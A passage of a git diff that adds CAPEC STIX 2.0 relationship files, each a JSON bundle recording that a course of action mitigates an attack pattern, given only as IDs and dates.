"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0b652a5c-281d-4140-90be-a1a5414312c5.json b/capec/relationship/relationship--0b652a5c-281d-4140-90be-a1a5414312c5.json new file mode 100644 index 0000000000..a07379b454 --- /dev/null +++ b/capec/relationship/relationship--0b652a5c-281d-4140-90be-a1a5414312c5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--755325c1-42cf-4282-bbcf-b8842f1efb4e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b652a5c-281d-4140-90be-a1a5414312c5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f", + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580.json b/capec/relationship/relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580.json new file mode 100644 index 0000000000..08f4b083cc --- /dev/null +++ b/capec/relationship/relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--37f6b825-7ab5-488c-8137-b77a46b84eda", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd", + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4.json b/capec/relationship/relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4.json new file mode 100644 index 0000000000..bb9c16d7ae --- /dev/null +++ b/capec/relationship/relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c2d2d70d-d5d1-453a-b553-5c53629a043e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d", + "target_ref": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0c079c84-5667-434a-a119-440390839df5.json b/capec/relationship/relationship--0c079c84-5667-434a-a119-440390839df5.json new file mode 100644 index 0000000000..35844a4d7b --- /dev/null +++ b/capec/relationship/relationship--0c079c84-5667-434a-a119-440390839df5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7bf62eb3-e576-4f4a-a379-41e86e225cb8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c079c84-5667-434a-a119-440390839df5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--085071c4-d704-47be-85af-ebcd54320914", + "target_ref": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0c11c0e0-9843-4467-b588-8275b71b6be1.json b/capec/relationship/relationship--0c11c0e0-9843-4467-b588-8275b71b6be1.json new file mode 100644 index 0000000000..113c693d05 --- /dev/null +++ b/capec/relationship/relationship--0c11c0e0-9843-4467-b588-8275b71b6be1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bdedae22-945c-4c7f-a65a-572d40388ef2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c11c0e0-9843-4467-b588-8275b71b6be1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc", + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0c670e55-6327-4cc7-a383-353905982408.json b/capec/relationship/relationship--0c670e55-6327-4cc7-a383-353905982408.json new file mode 100644 index 0000000000..6a06282d79 --- /dev/null +++ b/capec/relationship/relationship--0c670e55-6327-4cc7-a383-353905982408.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6aa7460f-0ed2-48fc-a5a7-5b633b8d0e8b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c670e55-6327-4cc7-a383-353905982408", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0c8969f7-76a6-4787-8881-8d87de5bd816.json b/capec/relationship/relationship--0c8969f7-76a6-4787-8881-8d87de5bd816.json new file mode 100644 index 0000000000..1a526b2608 --- /dev/null +++ b/capec/relationship/relationship--0c8969f7-76a6-4787-8881-8d87de5bd816.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fd2e0592-d4a6-4d15-80b4-4ae24b9dced2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c8969f7-76a6-4787-8881-8d87de5bd816", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b669e453-8bfb-4dd3-bee9-992473335348", + "target_ref": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0c9b0403-cc38-48bb-871f-cea56cc7d045.json b/capec/relationship/relationship--0c9b0403-cc38-48bb-871f-cea56cc7d045.json new file mode 100644 index 0000000000..b16bc9f10c --- /dev/null +++ b/capec/relationship/relationship--0c9b0403-cc38-48bb-871f-cea56cc7d045.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c6508e2c-9bdd-46a1-9c54-c9ee9d32150b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c9b0403-cc38-48bb-871f-cea56cc7d045", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a", + "target_ref": "attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0ce0b1a5-555f-4061-a003-1a489efe2625.json b/capec/relationship/relationship--0ce0b1a5-555f-4061-a003-1a489efe2625.json new file mode 100644 index 0000000000..16f883d834 --- /dev/null +++ b/capec/relationship/relationship--0ce0b1a5-555f-4061-a003-1a489efe2625.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--90c90078-eb5e-461e-a6ee-d670abc8b686", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0ce0b1a5-555f-4061-a003-1a489efe2625", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91", + "target_ref": "attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0cf961b0-ae35-4695-994f-8039e3fcc61f.json b/capec/relationship/relationship--0cf961b0-ae35-4695-994f-8039e3fcc61f.json new file mode 100644 index 0000000000..5556bf40c2 --- /dev/null +++ b/capec/relationship/relationship--0cf961b0-ae35-4695-994f-8039e3fcc61f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6c77865b-2f1c-42eb-aa29-3362369a248e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0cf961b0-ae35-4695-994f-8039e3fcc61f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3", + "target_ref": "attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0d2a6192-e031-4fc4-b2fa-ee091bbe6a50.json b/capec/relationship/relationship--0d2a6192-e031-4fc4-b2fa-ee091bbe6a50.json new file mode 100644 index 0000000000..aab4a83ceb --- /dev/null +++ b/capec/relationship/relationship--0d2a6192-e031-4fc4-b2fa-ee091bbe6a50.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2884b046-229c-480f-bcbd-4b76fd2389fc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d2a6192-e031-4fc4-b2fa-ee091bbe6a50", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0d4a32c6-dddf-4dfb-be37-f273a260cde1.json b/capec/relationship/relationship--0d4a32c6-dddf-4dfb-be37-f273a260cde1.json new file mode 100644 index 0000000000..89f227e759 --- /dev/null +++ b/capec/relationship/relationship--0d4a32c6-dddf-4dfb-be37-f273a260cde1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--56d3ee54-2c6b-4310-8ed2-46cc65af58d0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d4a32c6-dddf-4dfb-be37-f273a260cde1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44", + "target_ref": "attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f.json b/capec/relationship/relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f.json new file mode 100644 index 0000000000..eaa50c9e98 --- /dev/null +++ b/capec/relationship/relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5419cc38-c064-4f1b-af2c-a2b3d8261a9a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0e746897-8cb9-4202-bed5-27c2fcc346df.json b/capec/relationship/relationship--0e746897-8cb9-4202-bed5-27c2fcc346df.json new file mode 100644 index 0000000000..543fadcf45 --- /dev/null +++ b/capec/relationship/relationship--0e746897-8cb9-4202-bed5-27c2fcc346df.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--56180628-2b04-4717-a341-1c68bcc4f5d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e746897-8cb9-4202-bed5-27c2fcc346df", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf", + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0fa93fd1-67a7-46f1-9cc0-f274c2d551b3.json b/capec/relationship/relationship--0fa93fd1-67a7-46f1-9cc0-f274c2d551b3.json new file mode 100644 index 0000000000..a65adf50f9 --- /dev/null +++ b/capec/relationship/relationship--0fa93fd1-67a7-46f1-9cc0-f274c2d551b3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d4010def-4035-4168-91fc-356298c563ea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0fa93fd1-67a7-46f1-9cc0-f274c2d551b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5", + "target_ref": "attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd.json b/capec/relationship/relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd.json new file mode 100644 index 0000000000..4e97bf1158 --- /dev/null +++ b/capec/relationship/relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4bf2c554-4358-4959-bb45-6176f788501d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--103ed571-70dd-468a-8af7-d63da596f200.json b/capec/relationship/relationship--103ed571-70dd-468a-8af7-d63da596f200.json new file mode 100644 index 0000000000..d468a5fee3 --- /dev/null +++ b/capec/relationship/relationship--103ed571-70dd-468a-8af7-d63da596f200.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--80bdb735-478a-4ffc-b342-8afb859a563e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--103ed571-70dd-468a-8af7-d63da596f200", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76.json b/capec/relationship/relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76.json new file mode 100644 index 0000000000..63916be4e1 --- /dev/null +++ b/capec/relationship/relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ba74aa6d-c725-45ea-a19e-ae539f921017", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41", + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--10789595-855a-44a4-8fe8-78678c296ed7.json b/capec/relationship/relationship--10789595-855a-44a4-8fe8-78678c296ed7.json new file mode 100644 index 0000000000..d76071dd3c --- /dev/null +++ b/capec/relationship/relationship--10789595-855a-44a4-8fe8-78678c296ed7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c22f2d45-b440-46ce-9fb5-68e87ec3b06a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10789595-855a-44a4-8fe8-78678c296ed7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9", + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea.json b/capec/relationship/relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea.json new file mode 100644 index 0000000000..0b14e3384d --- /dev/null +++ b/capec/relationship/relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7955d699-6396-4d75-ac9a-2492c5fbc328", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--10ea2f65-887c-421b-a3d5-8056685a42d5.json b/capec/relationship/relationship--10ea2f65-887c-421b-a3d5-8056685a42d5.json new file mode 100644 index 0000000000..a4b689adc2 --- /dev/null +++ b/capec/relationship/relationship--10ea2f65-887c-421b-a3d5-8056685a42d5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c6cbd66d-a54f-435d-a0d5-328a2bf8f6c1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10ea2f65-887c-421b-a3d5-8056685a42d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785", + "target_ref": "attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--110567ab-f53e-4f7e-ba84-08578ee941c8.json b/capec/relationship/relationship--110567ab-f53e-4f7e-ba84-08578ee941c8.json new file mode 100644 index 0000000000..bc0bae5db0 --- /dev/null +++ b/capec/relationship/relationship--110567ab-f53e-4f7e-ba84-08578ee941c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d44bd9f6-1470-429a-9fa1-69526ee8c903", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--110567ab-f53e-4f7e-ba84-08578ee941c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567", + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--11351ce9-4860-4659-b06f-dffcc542cc7d.json b/capec/relationship/relationship--11351ce9-4860-4659-b06f-dffcc542cc7d.json new file mode 100644 index 0000000000..72b4ae4f94 --- /dev/null +++ b/capec/relationship/relationship--11351ce9-4860-4659-b06f-dffcc542cc7d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--133aa166-84d5-4530-8cc2-29f820380499", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--11351ce9-4860-4659-b06f-dffcc542cc7d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d", + "target_ref": "attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--113ef7e7-b8bd-44d3-bfae-8dcffd163521.json b/capec/relationship/relationship--113ef7e7-b8bd-44d3-bfae-8dcffd163521.json new file mode 100644 index 0000000000..cf1eba5ccb --- /dev/null +++ b/capec/relationship/relationship--113ef7e7-b8bd-44d3-bfae-8dcffd163521.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--41de80b1-1330-4671-b264-bd00e698d617", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--113ef7e7-b8bd-44d3-bfae-8dcffd163521", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d", + "target_ref": "attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e.json b/capec/relationship/relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e.json new file mode 100644 index 0000000000..4191a3b7fc --- /dev/null +++ b/capec/relationship/relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f042df20-3457-430d-a916-4975dd064be2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f", + "target_ref": "attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935.json b/capec/relationship/relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935.json new file mode 100644 index 0000000000..c03a3f7d09 --- /dev/null +++ b/capec/relationship/relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--795610b4-438b-485d-8584-83c921787c9e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31", + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54.json b/capec/relationship/relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54.json new file mode 100644 index 0000000000..66cb6696af --- /dev/null +++ b/capec/relationship/relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9ce09dec-0aff-4f6a-8700-6cc379ad7b4d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430.json b/capec/relationship/relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430.json new file mode 100644 index 0000000000..e31c33e462 --- /dev/null +++ b/capec/relationship/relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--87e083da-ac68-4d76-8c5b-ecd46f6207f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git 